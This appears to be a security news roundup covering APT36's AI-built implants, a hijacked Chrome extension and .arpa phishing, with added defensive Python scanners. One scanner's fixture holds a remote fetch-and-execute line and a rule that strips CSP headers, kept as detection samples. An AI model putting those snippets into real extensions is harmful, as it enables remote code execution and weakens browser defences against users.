AI
Pakistan's main APT group has switched from off-the-shelf, low-quality malware tools to vibe-coded custom malware
Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control. Identified victims were infected with multiple, parallel implants, each using a different language and communication protocol.
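The defensive angle on the C2 pattern described above: implants that relay through Slack, Discord, Supabase or Google Sheets hide in traffic to hosts the proxy already trusts, so the useful signals are the client that made the request and the timing. The script below is an added example (not code from the article or from any vendor report) that reads a constructed CSV proxy log, keeps only requests to those SaaS API hosts, drops user-agents that look like browsers or official desktop clients, and flags flows whose inter-request gaps are too regular to be a human. The log format, host list and user-agent prefixes are assumptions for the demonstration.

```python
import csv
import io
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log (CSV; not from the article). Columns:
# timestamp, client_ip, user_agent, dest_host, path
SAMPLE_LOG = """\
timestamp,client_ip,user_agent,dest_host,path
2026-03-02T09:00:00,10.0.0.15,"Mozilla/5.0 (Windows NT 10.0) Chrome/122",app.slack.com,/client
2026-03-02T09:00:05,10.0.0.21,NimHttpClient/0.2,slack.com,/api/chat.postMessage
2026-03-02T09:01:05,10.0.0.21,NimHttpClient/0.2,slack.com,/api/chat.postMessage
2026-03-02T09:02:04,10.0.0.21,NimHttpClient/0.2,slack.com,/api/chat.postMessage
2026-03-02T09:03:06,10.0.0.21,NimHttpClient/0.2,slack.com,/api/chat.postMessage
2026-03-02T09:00:10,10.0.0.21,Crystal,abcd.supabase.co,/rest/v1/tasks
2026-03-02T09:10:10,10.0.0.21,Crystal,abcd.supabase.co,/rest/v1/tasks
2026-03-02T09:20:10,10.0.0.21,Crystal,abcd.supabase.co,/rest/v1/tasks
2026-03-02T09:05:00,10.0.0.33,"Mozilla/5.0 (Windows NT 10.0) Chrome/122",sheets.googleapis.com,/v4/spreadsheets/x
2026-03-02T09:05:00,10.0.0.40,curl/8.5.0,discord.com,/api/v10/channels/1/messages
"""

# SaaS platforms the article names as C2 relays. Matched by host suffix.
CLOUD_C2_SUFFIXES = ("slack.com", "discord.com", "discordapp.com",
                     "supabase.co", "googleapis.com")

# User-agent prefixes treated as expected (browsers, official desktop clients).
# This list is an assumption; tune it to what your fleet actually runs.
EXPECTED_UA_PREFIXES = ("Mozilla/", "Slack/", "Discord/")


def is_cloud_c2_host(host):
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in CLOUD_C2_SUFFIXES)


def is_expected_ua(user_agent):
    return user_agent.startswith(EXPECTED_UA_PREFIXES)


def beacon_regularity(timestamps):
    """Coefficient of variation of the gaps between requests; near 0 means a fixed timer."""
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    return statistics.pstdev(gaps) / mean if mean > 0 else None


def find_suspect_beacons(log_text, min_requests=3, max_cv=0.2):
    """Return (client_ip, dest_host, user_agent, request_count, cv) for flows where a
    non-browser client talks to a SaaS API on a suspiciously regular interval."""
    flows = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        if not is_cloud_c2_host(row["dest_host"]) or is_expected_ua(row["user_agent"]):
            continue
        key = (row["client_ip"], row["dest_host"].lower(), row["user_agent"])
        flows[key].append(datetime.fromisoformat(row["timestamp"]))

    suspects = []
    for (ip, host, ua), times in flows.items():
        times.sort()
        if len(times) < min_requests:
            continue
        cv = beacon_regularity(times)
        if cv is not None and cv <= max_cv:
            suspects.append((ip, host, ua, len(times), round(cv, 3)))
    return sorted(suspects)


if __name__ == "__main__":
    for suspect in find_suspect_beacons(SAMPLE_LOG):
        print("suspect beacon:", suspect)
```

On the sample data the two parallel implants on 10.0.0.21 (one Nim-style client posting to the Slack API every ~60 s, one Crystal client polling a Supabase table every 10 min) are flagged, while the browser sessions and the single curl call are not. The two-implant result mirrors the article's observation that victims carried several implants with different languages and channels, which is why the key groups by user-agent as well as by destination.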
AI as tradecraft: How threat actors operationalize AI | Microsoft Security Blog
Threat actors use generative AI to draft phishing lures, translate content, summarize stolen data, generate or debug malware, and scaffold scripts or infrastructure. For these uses, AI functions as a force multiplier that reduces technical friction and accelerates execution, while human operators retain control over objectives, targeting, and deployment decisions.
Microsoft Threat Intelligence has observed early threat actor experimentation with agentic AI, where models support iterative decision‑making and task execution.
Anthropic’s AI Hacked the Firefox Browser. It Found a Lot of Bugs.
Over a two-week period in January, Claude Opus 4.6 found more high-severity bugs in Firefox than the rest of the world typically reports in two months, Mozilla said.
Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware
The threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool. The researchers say that "just hosting the malware on GitHub was enough to poison Bing AI search results."
Deepfakes, Noise, and Doubt: AI's Role in Three Recent Elections
In the span of six weeks, Graphika monitored influence operations targeting elections in Bangladesh, Colombia, and Tibet.
Election interference operations combine AI-generated content with automated distribution, utilizing coordinated inauthentic accounts to simulate organic reach.
Narratives are increasingly shifting toward delegitimizing the electoral process and institutions in addition to candidate attacks.
Generative AI makes it easier for state-linked actors to produce high-volume, bilingual content tailored to local political contexts.
Politics
EU court adviser says banks must immediately refund phishing victims
The case involved phishing fraud, where the customer advertised an item for sale on an auction platform and was approached by a fraudster who sent them a malicious link to a page resembling the bank’s login interface.
The customer entered their bank account credentials on that site, which the fraudster then used to execute an unauthorized payment.
Athanasios Rantos, the Advocate General of the Court of Justice of the EU (CJEU), has issued a formal opinion suggesting that banks must immediately refund account holders affected by unauthorized transactions, even when it's their fault.
DHS Wants to Build a System to Surveil Americans’ Travel Records
DHS outlines the specifics they envision: a program that would provide real-time or near-real time access to a range of personal travel data, including passenger names, origins and destinations, flight numbers, ticket numbers, and forms of payment. The data would be gleaned from third-party ticketing sites, such as Orbitz or Expedia, and must cover major US and international airlines.
This study might make you stop drinking bottled water forever
People swallow between 39,000 and 52,000 microplastic particles every year. Bottled water drinkers add roughly 90,000 more. Research links this to chronic inflammation, hormonal disruption, oxidative stress, neurological problems, even cancer.
Fishing crews in the Atlantic keep accidentally dredging up chemical weapons
There were at least three incidents of commercial fishing crews dredging up dangerous chemical warfare munitions (CWMs) off the coast of New Jersey between 2016 and 2023.
The three incidents exposed at least six crew members to mustard agent, which causes blistering chemical burns on skin and mucous membranes.
Girl Scouts highly unimpressed after New Jersey troop teams up with local cannabis dispensary to sell cookies
Set up near Daylite Dispensary in Mount Laurel last month, the troop’s booth offered the full line-up of treats. Dispensary owner Steve Cassidy said the partnership was a massive success and drew people both to the booth and the cannabis shop.
Pentagon taps controversial DOGE employee to lead its AI efforts amid Anthropic fallout
He reposted content from figures such as white supremacist Nick Fuentes and self-described misogynist Andrew Tate.
From Iran to Ukraine, everyone’s trying to hack security cameras
Tel Aviv–based security firm Check Point released new research describing hundreds of hacking attempts that targeted consumer-grade security cameras around the Middle East—with many apparently timed to Iran’s recent missile and drone strikes on targets that included Israel, Qatar, and Cyprus. Those camera-hijacking efforts, some of which Check Point has attributed to a hacker group that’s been previously linked to Iranian intelligence, suggest that Iran’s military has tried to use civilian surveillance cameras as a means to spot targets, plan strikes, or assess damage from its attacks,
Breaking Down The Tech ICE Uses To Spy On You -- YouTube
A good video summarizing the situation, from facial recognition to evading encryption.
Infosec
From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain
A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data.
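The capabilities listed above (stripping security headers, injecting lures, running server-delivered JavaScript) leave static fingerprints in an unpacked extension before any traffic is seen. The scanner below is an added example, not code from the article or from any extension-analysis product, and the manifest, ruleset and background-script snippets it examines are constructed for the demonstration, not ShotBird's real files. It flags broad host permissions combined with scripting, declarativeNetRequest rules that remove protective response headers, and dynamic-code sinks that would let a fetched task run as code.

```python
import json
import re

# Constructed sample of an unpacked MV3 extension (NOT the real ShotBird files).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Example Screenshot Helper",
    "version": "2.1.0",
    "permissions": ["declarativeNetRequest", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
    "declarative_net_request": {"rule_resources": [
        {"id": "ruleset_1", "enabled": True, "path": "rules.json"}]},
    "background": {"service_worker": "bg.js"},
})

# Constructed rules.json: removes CSP and framing protection on every top-level page.
SAMPLE_RULES = json.dumps([
    {"id": 1, "priority": 1,
     "action": {"type": "modifyHeaders", "responseHeaders": [
         {"header": "content-security-policy", "operation": "remove"},
         {"header": "x-frame-options", "operation": "remove"}]},
     "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}},
])

# Constructed bg.js fragment: the "callback-delivered task" pattern the scanner looks for.
SAMPLE_BG_JS = "const task = await (await fetch(TASK_URL)).text();\nnew Function(task)();\n"

# Response headers whose removal weakens a page's defence against injected script or framing.
PROTECTIVE_HEADERS = {"content-security-policy", "content-security-policy-report-only",
                      "x-frame-options", "strict-transport-security"}

BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Sinks that turn a string (possibly fetched at runtime) into executable code.
DYNAMIC_CODE_PATTERNS = [r"\beval\s*\(", r"new\s+Function\s*\(",
                         r"importScripts\s*\(\s*['\"]https?://"]


def scan_manifest(manifest):
    """Permission combinations worth a reviewer's attention."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    broad = BROAD_HOST_PATTERNS & perms
    if broad:
        findings.append(f"broad host access: {sorted(broad)}")
    if "webRequestBlocking" in perms:
        findings.append("webRequestBlocking: can rewrite requests and responses in flight")
    if perms & {"declarativeNetRequest", "declarativeNetRequestWithHostAccess"}:
        findings.append("declarativeNetRequest: static rules can strip response headers")
    if "scripting" in perms and broad:
        findings.append("scripting + broad host access: can inject JavaScript into any page")
    return findings


def scan_dnr_rules(rules):
    """modifyHeaders rules that delete protective response headers."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        removed = {h["header"].lower() for h in action.get("responseHeaders", [])
                   if h.get("operation") == "remove"}
        hit = removed & PROTECTIVE_HEADERS
        if hit:
            scope = rule.get("condition", {}).get("urlFilter", "?")
            findings.append(f"rule {rule.get('id')} removes {sorted(hit)} for urlFilter={scope!r}")
    return findings


def scan_script(source):
    return [f"dynamic code sink: {pat}" for pat in DYNAMIC_CODE_PATTERNS if re.search(pat, source)]


def scan_extension(manifest_text, rules_text, bg_text):
    return {
        "manifest": scan_manifest(json.loads(manifest_text)),
        "rules": scan_dnr_rules(json.loads(rules_text)),
        "script": scan_script(bg_text),
    }


if __name__ == "__main__":
    for section, findings in scan_extension(SAMPLE_MANIFEST, SAMPLE_RULES, SAMPLE_BG_JS).items():
        for finding in findings:
            print(f"[{section}] {finding}")
```

None of these findings alone proves malice (screenshot tools legitimately ask for broad host access), which is why the ownership-transfer signal in the article matters: an update that newly adds header-removal rules or a dynamic-code sink to an already-installed, formerly trusted extension is the combination to alert on.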
Hackers abuse .arpa DNS and IPv6 to evade phishing defenses
In normal DNS functionality, reverse DNS domains are used for PTR records, which allow systems to determine the hostname associated with a queried IP address.
However, attackers discovered that once they gained control over the DNS zone for an IPv6 range, some DNS management platforms allowed them to configure other record types that can be abused for phishing attacks.
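A cheap control that follows directly from the mechanism above: hostnames under in-addr.arpa and ip6.arpa exist to answer PTR queries and have no business appearing in a link a user is asked to click, so a mail gateway or URL filter can treat them as a hard signal. The checker below is an added example (not code from the article or from any vendor) that extracts the host from a URL, tests whether it falls under a reverse-DNS zone, and decodes the trailing nibble or octet labels back into the IPv4/IPv6 prefix whose delegation the sender controls, which is what an analyst wants to know next. The sample URLs are constructed; the 2001:db8::/32 prefix is the documentation range.

```python
import ipaddress
from urllib.parse import urlsplit

REVERSE_ZONES = ("in-addr.arpa", "ip6.arpa")

# Constructed sample URLs (not from the article); the .arpa ones are the kind of
# name an attacker could create once they control the reverse zone for a prefix.
SAMPLE_URLS = [
    "https://www.example.com/login",
    "https://login.bank-example.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa/verify",
    "http://mail.0.168.192.in-addr.arpa/",
]

HEX_NIBBLES = set("0123456789abcdef")


def reverse_zone(hostname):
    """Return the reverse-DNS zone a hostname falls under, or None."""
    host = hostname.lower().rstrip(".")
    for zone in REVERSE_ZONES:
        if host == zone or host.endswith("." + zone):
            return zone
    return None


def decode_ip6_arpa(hostname):
    """Recover the IPv6 prefix from the nibble labels directly in front of ip6.arpa.
    The label nearest 'ip6' is the most significant nibble; labels further left that
    are not single hex digits are attacker-chosen decoration and stop the walk."""
    labels = hostname.lower().rstrip(".").split(".")
    if labels[-2:] != ["ip6", "arpa"]:
        return None
    nibbles = []
    for label in reversed(labels[:-2]):
        if len(label) == 1 and label in HEX_NIBBLES:
            nibbles.append(label)
        else:
            break
    if not nibbles or len(nibbles) > 32:
        return None
    padded = ("".join(nibbles) + "0" * 32)[:32]
    return ipaddress.IPv6Network((int(padded, 16), 4 * len(nibbles)), strict=False)


def decode_in_addr_arpa(hostname):
    """Same idea for IPv4: octet labels in front of in-addr.arpa, least significant first."""
    labels = hostname.lower().rstrip(".").split(".")
    if labels[-2:] != ["in-addr", "arpa"]:
        return None
    octets = []
    for label in reversed(labels[:-2]):
        if label.isdigit() and int(label) <= 255:
            octets.append(int(label))
        else:
            break
    if not octets or len(octets) > 4:
        return None
    addr = ".".join(str(o) for o in octets + [0] * (4 - len(octets)))
    return ipaddress.IPv4Network((addr, 8 * len(octets)), strict=False)


def check_url(url):
    """Return a finding for a URL whose host lives in a reverse-DNS zone, else None."""
    host = urlsplit(url).hostname or ""
    zone = reverse_zone(host)
    if zone is None:
        return None
    prefix = decode_ip6_arpa(host) if zone == "ip6.arpa" else decode_in_addr_arpa(host)
    return {"host": host, "zone": zone, "prefix": str(prefix) if prefix else None}


def scan_urls(urls):
    return [finding for finding in map(check_url, urls) if finding]


if __name__ == "__main__":
    for finding in scan_urls(SAMPLE_URLS):
        print("reverse-DNS host in link:", finding)
```

The decoded prefix is the pivot: it identifies the address block whose reverse delegation the sender holds (or has taken over), so the same block can be searched for in historical mail and proxy logs and reported to the registry or hosting provider that delegated it.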
enject: Hide .env secrets from prAIng eyes: secrets live in local encrypted stores (per project) and are injected directly into apps at runtime, never touching disk as plaintext
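The pattern behind the tool above, shown as an added example that is not enject's code: secrets sit in an encrypted store, are decrypted only in the launching process's memory, and reach the application through the child's environment rather than through a plaintext .env file on disk. The construction here is stdlib-only and an assumption for illustration (PBKDF2 for the passphrase, HMAC-SHA256 in counter mode as the keystream, a separate HMAC tag checked before decryption); a production tool would use a vetted AEAD such as AES-GCM or ChaCha20-Poly1305 and an OS keystore for the passphrase.

```python
import hashlib
import hmac
import json
import os
import subprocess
import sys

# Illustrative encrypt-then-MAC store (assumed construction, not enject's format):
#   blob = salt(16) || nonce(16) || ciphertext || tag(32)
ITERATIONS = 200_000


def derive_keys(passphrase, salt):
    """Split a PBKDF2 output into an encryption key and a MAC key."""
    km = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, ITERATIONS, dklen=64)
    return km[:32], km[32:]


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode, used as a PRF to produce a keystream."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal_store(secrets, passphrase):
    """Serialize a dict of secret name -> value and return the encrypted store bytes."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = derive_keys(passphrase, salt)
    plaintext = json.dumps(secrets).encode()
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return salt + nonce + ciphertext + tag


def open_store(blob, passphrase):
    """Verify the tag first, then decrypt; never returns partially trusted data."""
    salt, nonce, ciphertext, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    enc_key, mac_key = derive_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("store tampered with or wrong passphrase")
    plaintext = bytes(c ^ k for c, k in zip(ciphertext, keystream(enc_key, nonce, len(ciphertext))))
    return json.loads(plaintext)


def build_child_env(blob, passphrase, base_env):
    """The injection step: secrets exist only in this dict, which is handed to the child."""
    env = dict(base_env)
    env.update(open_store(blob, passphrase))
    return env


def run_with_secrets(blob, passphrase, argv):
    env = build_child_env(blob, passphrase, os.environ)
    return subprocess.run(argv, env=env, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed sample project secrets; the store would normally live in a per-project file.
    store = seal_store({"API_TOKEN": "example-token-123", "DB_URL": "postgres://db/app"},
                       "correct horse battery staple")
    print(run_with_secrets(store, "correct horse battery staple",
                           [sys.executable, "-c", "import os; print(os.environ['API_TOKEN'])"]))
```

The on-disk artefact is only ever the sealed blob, and the child process sees the values exactly as it would from a .env file, so the application needs no code change. Note the trade-off the page's description implies: environment variables are readable by anything that can inspect the process (ps, /proc, crash dumps), so this removes the plaintext-file exposure, not the exposure to an attacker already running as the same user.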
Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition